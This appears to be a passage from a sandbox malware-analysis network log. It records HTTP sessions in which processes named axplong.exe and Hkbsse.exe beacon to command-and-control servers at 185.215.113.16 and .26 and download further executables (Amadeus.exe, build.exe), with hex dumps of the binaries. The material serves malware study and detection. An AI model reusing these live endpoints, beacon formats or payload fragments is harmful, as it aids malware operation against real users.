Sep 3, 2024 17:13:39.312233925 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:39.521840096 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:39.785866022 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	49754	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:40.015337944 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000228001&unit=246122658369
Sep 3, 2024 17:13:40.810116053 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Sep 3, 2024 17:13:40.811150074 CEST	55	OUT	GET /inc/Amadeus.exe HTTP/1.1 Host: 185.215.113.16
Sep 3, 2024 17:13:41.065114021 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:40 GMT Content-Type: application/octet-stream Content-Length: 5562368 Last-Modified: Sat, 31 Aug 2024 23:00:17 GMT Connection: keep-alive ETag: "66d3a081-54e000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 02 52 00 00 00 00 00 e0 00 02 01 0b 01 03 00 00 a4 24 00 00 6c 08 00 00 00 00 00 00 20 07 00 00 10 00 00 00 b0 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 57 00 00 04 00 00 97 14 55 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 52 00 4c 04 00 00 00 c0 54 00 e9 db 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 52 00 bc dd 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELR$l J@WU@RLTRJ.textx$$ `.rdatad%$%$@@.data`JJ@.idataLRP@.relocR$P@B.symtabTRB.rsrcTR@@
Sep 3, 2024 17:13:41.065130949 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8b 04 24 c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b 0c 24 c3 cc cc cc cc cc Data Ascii: $$$$,$4$<$lBd;av D$$D$D$lBd
Sep 3, 2024 17:13:41.065144062 CEST	1236	IN	Data Raw: 74 03 00 8d 05 7e 7a 6b 00 89 04 24 c7 44 24 04 02 00 00 00 e8 1c 74 03 00 e8 17 6c 03 00 8b 4c 24 2c 8b 74 24 3c e9 0b fc ff ff e8 e5 ff 06 00 e8 e0 ff 06 00 e8 db ff 06 00 8b 35 70 47 90 00 97 88 44 2e 0d 97 40 39 d8 7d 26 8b 0d 74 47 90 00 39 Data Ascii: t~zk$D$tlL$,t$<5pGD.@9}&tG9s.5pGD.tG9rL$,t$<{PlBd;av04g$+D$@
Sep 3, 2024 17:13:41.065288067 CEST	1236	IN	Data Raw: 15 ea 49 92 00 89 54 0b 48 83 f8 04 0f 8d 1e 01 00 00 8b 05 78 47 90 00 8b 0d 74 47 90 00 83 c1 03 8b 15 70 47 90 00 39 c8 73 5a 89 14 24 89 4c 24 04 89 44 24 08 c7 44 24 0c 03 00 00 00 8d 05 c0 63 69 00 89 44 24 10 e8 64 a9 06 00 8b 44 24 1c 8b Data Ascii: ITHxGtGpG9sZ$L$D$D$ciD$dD$L$T$xGDtcpGGpGtGADfDDt-_LOLOLOL OL(OOkILDf
Sep 3, 2024 17:13:41.065299988 CEST	1236	IN	Data Raw: 00 00 8b 44 24 50 8b 8c 24 9c 00 00 00 8b 54 24 54 31 db eb 05 89 6c 08 fc 43 83 fb 04 7d 4b 83 c0 04 8b 6c 9c 7c 39 c2 73 eb 89 5c 24 68 89 6c 24 5c 89 0c 24 89 44 24 04 89 54 24 08 c7 44 24 0c 04 00 00 00 8d 05 00 49 67 00 89 44 24 10 e8 89 a4 Data Ascii: D$P$T$T1lC}Kl\|9s\$hl$\$D$T$D$IgD$L$D$T$\$hl$\$D$PT$d$D$D$L$T$\$D$lL$pT$t\$xD$P$T$d1lC}Yll9s\$hl$X$D$T$D$
Sep 3, 2024 17:13:41.065309048 CEST	1236	IN	Data Raw: c1 8d 5c 59 ff 89 18 c3 cc 8b 74 24 04 8b 5c 24 08 8b 7c 24 10 8b 54 24 14 8d 44 24 1c e9 f7 fe ff ff cc cc cc cc cc cc cc 8b 74 24 04 8b 5c 24 08 8b 7c 24 0c 8b 54 24 10 8d 44 24 14 e9 d7 fe ff ff cc cc cc cc cc cc cc 83 fb 04 0f 82 88 00 00 00 Data Ascii: \Yt$\$\|$T$D$t$\$\|$T$D$@r[oooVo_of oo ov0o0ftftftftffff@@@tv9tLT9t/w6
Sep 3, 2024 17:13:41.065321922 CEST	1236	IN	Data Raw: 74 01 01 85 db 7c 52 89 0c 24 0f b6 36 89 f7 83 e6 7f 89 d9 d3 e6 83 f9 20 19 db 21 de 01 f2 97 f6 c0 80 97 75 c8 90 8b 0c 24 8d 44 01 02 85 d2 7c 22 89 c1 f7 d8 39 d0 72 0c 89 4c 24 0c 89 54 24 10 83 c4 04 c3 85 c9 74 05 e8 26 f9 05 00 e8 61 f9 Data Ascii: t\|R$6 !u$D\|"9rL$T$t&aG*LlBd;aD$t11D$D$\$KIYtL$6 !u\$
Sep 3, 2024 17:13:41.065448046 CEST	1236	IN	Data Raw: 48 67 00 89 0c 24 89 44 24 04 e8 52 7e 06 00 c7 04 24 00 00 00 00 8d 05 2c 42 6c 00 89 44 24 04 c7 44 24 08 1c 00 00 00 8b 44 24 60 89 44 24 0c c7 44 24 10 00 04 00 00 8d 05 34 7c 6b 00 89 44 24 14 c7 44 24 18 03 00 00 00 e8 42 db 04 00 8b 44 24 Data Ascii: Hg$D$R~$,BlD$D$D$`D$D$4\|kD$D$BD$L$ $L$3D$Hg$D$}-lBd;avUYuRT$t=0-09~D@vMEL$D$1[
Sep 3, 2024 17:13:41.065459013 CEST	1236	IN	Data Raw: 0f b6 5c 24 58 09 fb 0f b6 7c 24 59 c1 e7 08 09 df 0f b6 5c 24 5a c1 e3 10 09 df 0f b6 5c 24 5b c1 e3 18 09 fb 89 5c 24 30 0f b6 7c 24 5c 0f b6 5c 24 5d 89 5c 24 2c c1 e3 08 09 df 8b 5c 24 2c c1 eb 18 0f b6 6c 24 5e 89 6c 24 2c c1 ed 10 09 eb 8b Data Ascii: \$X\|$Y\$Z\$[\$0\|$\\$]\$,\$,l$^l$,l$,l$_l$,l$,\|$`\$a\|$b\|$cD$L$t$T$D$4D$D$0D$ l$$\|$(D$@\|$8t$"L$8$D$D$Z
Sep 3, 2024 17:13:41.065473080 CEST	1236	IN	Data Raw: fc 00 00 00 00 00 00 00 c3 e8 bb c9 06 00 e9 26 fe ff ff cc cc cc cc cc cc 8b 0d 6c 42 92 00 64 8b 09 8b 09 3b 61 08 0f 86 3c 03 00 00 83 ec 5c 8b 44 24 60 89 04 24 8b 44 24 64 89 44 24 04 8b 4c 24 68 89 4c 24 08 e8 ed fd ff ff 8b 44 24 64 31 c9 Data Ascii: &lBd;a<\D$`$D$dD$L$hL$D$d1\|$(T$\|$Pt$d<\l \$,\0\$(\@\$$\P\$ \`\$\p\$\$\$H\$D\$@\$<J
Sep 3, 2024 17:13:41.065592051 CEST	1236	IN	Data Raw: 3b 61 08 76 2b 83 ec 10 8b 44 24 14 89 04 24 8b 44 24 18 89 44 24 04 c7 44 24 08 01 00 00 00 e8 81 d7 06 00 8b 44 24 0c 89 44 24 1c 83 c4 10 c3 e8 c0 c4 06 00 eb be cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 0d 6c 42 92 00 64 8b 09 8b 09 3b 61 Data Ascii: ;av+D$$D$D$D$D$D$lBd;av+D$$D$D$D$1D$D$pBL$$L$L$D$D$D$lBd;av,D$@$L$L$D$S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	49755	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:40.068583965 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:40.866204977 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:40.866938114 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:41.128427029 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	49756	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:41.239016056 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:42.065474987 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:42.066713095 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:42.409233093 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	49757	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:42.686614037 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:43.725198984 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:43.726103067 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:43.989744902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	49758	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:44.122411966 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:44.987508059 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:45.031737089 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:45.299716949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	49759	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:45.417167902 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:46.236169100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:46.237123966 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:46.492683887 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	49760	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:46.562694073 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 33 38 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000238002&unit=246122658369
Sep 3, 2024 17:13:47.381253958 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	49761	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:46.606851101 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:47.440998077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:47.444422960 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:47.710463047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	49762	52.212.52.84	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:47.391747952 CEST	69	OUT	GET /3840509/build.exe?hash=AgADNB HTTP/1.1 Host: ddl.safone.dev
Sep 3, 2024 17:13:48.085791111 CEST	844	IN	HTTP/1.1 200 OK Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725376427&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=X3iu6xKf%2BifocRM3ww8hHLUbaauqrJwn9FkHkwblGUI%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725376427&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=X3iu6xKf%2BifocRM3ww8hHLUbaauqrJwn9FkHkwblGUI%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: keep-alive Content-Type: application/x-ms-dos-executable Range: bytes=0-423423 Content-Range: bytes 0-423423/423424 Content-Disposition: attachment; filename="build.exe" Accept-Ranges: bytes Content-Length: 423424 Date: Tue, 03 Sep 2024 15:13:47 GMT Server: Python/3.8 aiohttp/3.9.3 Via: 1.1 vegur
Sep 3, 2024 17:13:48.171360970 CEST	1236	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL]D0B2a @ @
Sep 3, 2024 17:13:48.171375036 CEST	1236	IN	Data Raw: 00 00 0a 25 80 08 00 00 04 28 02 00 00 2b 13 10 11 07 11 08 7e 2d 03 00 04 28 b1 05 00 06 00 11 07 11 0b 7e 2e 03 00 04 28 b5 05 00 06 00 11 07 11 06 fe 06 1e 00 00 06 73 22 00 00 0a 7e 09 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 2a 00 Data Ascii: %(+~-(~.(s"~%:&~*s#%(+~/(~0(s$~%:&~+s%%(+~1( s&~%:&~,s'%(
Sep 3, 2024 17:13:48.171386003 CEST	1236	IN	Data Raw: 03 00 04 28 f9 05 00 06 28 36 00 00 0a 3a 11 00 00 00 11 07 7e 3f 03 00 04 28 f9 05 00 06 38 0c 00 00 00 1f 3b 7e 28 03 00 04 28 9d 05 00 06 7e 3b 03 00 04 28 e9 05 00 06 00 11 07 11 07 7e 40 03 00 04 28 fd 05 00 06 28 36 00 00 0a 3a 11 00 00 00 Data Ascii: ((6:~?(8;~((~;(~@((6:~@(8;~((~<(~A((6:~A(8;~((~>(~A(;~(((79o8X
Sep 3, 2024 17:13:48.171444893 CEST	1236	IN	Data Raw: 00 00 0a 20 40 42 0f 00 6a 5b 21 00 91 10 b6 02 00 00 00 59 7e 48 03 00 04 28 1d 06 00 06 00 25 11 05 11 06 19 7e 3a 03 00 04 28 e5 05 00 06 6f 35 00 00 0a 7e 49 03 00 04 28 21 06 00 06 00 25 11 05 11 06 20 9a 00 00 00 7e 28 03 00 04 28 9d 05 00 Data Ascii: @Bj[!Y~H(%~:(o5~I(!% ~((~J(%~=(~K()~L(-j92(@(A(B!Y~H(:8~M(1(6
